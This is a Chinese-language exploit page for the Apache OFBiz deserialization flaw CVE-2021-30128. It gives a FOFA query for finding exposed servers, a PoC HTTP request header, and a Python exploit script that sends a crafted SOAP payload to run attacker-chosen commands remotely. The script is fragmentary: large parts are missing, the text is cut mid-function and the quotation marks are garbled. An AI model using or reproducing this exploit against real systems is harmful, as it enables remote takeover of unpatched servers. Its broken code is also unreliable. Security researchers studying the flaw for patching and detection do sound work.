# Apache OFBiz 反序列化(CVE-2021-30128)
影响版本
Apache OFBiz < 17.12.07 FOFA: `app="Apache_OFBiz"` 阿里云分析:https://mp.weixin.qq.com/s/Dr-jwiRr4NByjErjiX_e1w r0cky:https://mp.weixin.qq.com/s/ZBrWK3qsLwQs0v6dDi2_2A PoC: ```
POST /webtools/control/SOAPService HTTP/1.1
Host: 192.168.80.145:8443
User-Agent: python-requests/2.24.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: text/xml
Content-Length: 6093
“`
EXP.py:
“`py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
“””
@Author: r0cky
@Time: 2021/3/24-15:09
“””
import subprocess
import sys
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def banner():
print(“””
===================================================
____ ______ ____ _ ________ _______
/ __ \| ____| _ \(_) | ____\ \ / / __ \
| | | | |__ | |_) |_ ____ | |__ \ V /| |__) |
| | | | __| | _ <| |_ / | __| > < | ___/
| |__| | | | |_) | |/ / | |____ / . \| |
\____/|_| |____/|_/___| |______/_/ \_\_|
CVE-2021-30128 Powered by r0cky
===================================================
""") def bypass(payload):
className = ['org.apache.commons.beanutils.BeanComparator', 'org.apache.commons.collections.comparators.ComparableComparator', 'com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl'] for cn in className:
len_hex = hex(len(cn)).replace('0x','').upper()
className_hex = cn.encode().hex().upper() bypass_className = cn + '
“””.format(post_data)
print(“[+] payload sending…”)
r = requests.post(url, data=data, headers=headers, verify=False)
if r.status_code == 200:
print(“[+] send payload success.”)
print()
print(“[END] Apache OFBiz RCE Done.”)
else:
print(“[-] send payload failed.”)
print()
print(“[END] Apache OFBiz RCE failed.”)
headers={“Content-Type”: “text/xml”}
if __name__ == ‘__main__’:
banner()
try:
target = sys.argv[1]
cmd = sys.argv[2]
# target = “https://192.168.80.136:8443”
# vps_ip = “10.20.28.16”
# vps_port = “9999”
url = “{}/webtools/control/SOAPService”.format(target)
exp(url, cmd)
except:
print(“Example: \n\tpython3 ” + sys.argv[0] + ”
“`
ref:
* https://github.com/r0ckysec/CVE-2021-30128
* https://mp.weixin.qq.com/s/ZBrWK3qsLwQs0v6dDi2_2A
请登录后查看评论内容